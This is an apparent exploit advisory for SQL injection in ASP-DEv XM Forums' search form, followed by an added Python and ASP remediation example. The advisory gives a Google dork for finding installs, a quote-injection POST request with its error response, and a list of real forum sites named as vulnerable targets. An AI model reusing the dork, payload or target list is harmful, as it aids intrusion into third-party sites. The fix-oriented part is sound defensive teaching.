# Exploit Title: ASP-DEv XM Forums RC 3 Remote Post Sql Injection Vulnerability
# Google Dork: Intext:"Powered by ASP-DEv XM Forums RC 3"
# Date: 08/29/2012
# Author: Crim3R
# Site : Http://Ajaxtm.com/
# Download Link : http://www.asp-dev.com/download.asp?did=1
# Tested on: all
==================================

search form in ASP-DEv is Vulnerable to sql injection

P0C :

HTTP HEADERS :

Host: www.chillifarm.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.chillifarm.com/chilli_forum/search.asp
Cookie: TrackID=%7B54A35316%2D7519%2D405D%2D950A%2DA8CF50497150%7D; ASPSESSIONIDASSRDDBT=LPENAGHCNMNGMAOLEAJFMFOA
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

Post Data
--------------------
terms=%27&stype=1&in=1&forum=-1&ndays=0&mname=

Http response :

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ') ORDER BY tbl_Categories.cOrder, tbl_Forums.fOrder, tbl_Topics.tLastPostDate'.

D3M0 :

search query => post sql injection

http://www.chillifarm.com/chilli_forum/search.asp
http://forums.image-src.com/search.asp
http://www.df.com/Imaging/Forum/search.asp

===============Crim3R@Att.Net=========

[+] Greetz to All Ajaxtm Security Member

Cair3x - HUrr!c4nE - black.shadowes - hadihadi - iM4n - irsdl - the-0utl4w - Expl0its - Mormoroth - Mikili - Black.Spook - S3Ri0uS - Zalatan - Net.Edit0r - Ciph3r - A.u.r.A
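
The "Unclosed quotation mark" response above means the search form's terms value is pasted into the SQL text just before a `') ORDER BY` tail. The following is an added example, not code from the advisory or from ASP-DEv: it reproduces that failure and shows the bound-parameter fix, using Python's sqlite3 as a stand-in for the ASP / SQL Server stack. Only the table name tbl_Topics and the tLastPostDate ordering come from the error message; the column tSubject, the rows and the function names are assumptions.

```python
import sqlite3

# Constructed stand-in schema: only tbl_Topics and tLastPostDate appear in
# the error message on the page; tSubject and the rows are assumptions.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tbl_Topics (tSubject TEXT, tLastPostDate TEXT)")
    db.executemany("INSERT INTO tbl_Topics VALUES (?, ?)", [
        ("Growing habaneros", "2012-08-01"),
        ("O'Neill's seed swap", "2012-08-15"),
    ])
    return db

def search_concat(db, terms):
    """'Before' form: terms is pasted into the SQL text, so a quote in the
    input changes the structure of the statement."""
    sql = ("SELECT tSubject FROM tbl_Topics WHERE (tSubject LIKE '%" + terms +
           "%') ORDER BY tLastPostDate")
    return [r[0] for r in db.execute(sql)]

def search_param(db, terms):
    """Hardened form: terms travels as a bound parameter and stays data.
    LIKE wildcards in the input are escaped so they match literally."""
    esc = terms.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = ("SELECT tSubject FROM tbl_Topics WHERE (tSubject LIKE ? ESCAPE '\\') "
           "ORDER BY tLastPostDate")
    return [r[0] for r in db.execute(sql, ("%" + esc + "%",))]

def check(terms):
    """Run both forms; return (concatenated form broke?, parameterized rows)."""
    db = make_db()
    try:
        search_concat(db, terms)
        broke = False
    except sqlite3.OperationalError:
        # sqlite's counterpart of the page's error: the statement ends in an
        # unterminated string that begins at ') ORDER BY ...
        broke = True
    return broke, search_param(db, terms)

if __name__ == "__main__":
    print(check("'"))         # terms=%27 from the page, URL-decoded
    print(check("habanero"))  # ordinary search term
```

In classic ASP the same fix is an ADODB.Command with a parameter appended for the search term instead of a concatenated SQL string, plus custom error pages so provider errors like the one above are not returned to the client.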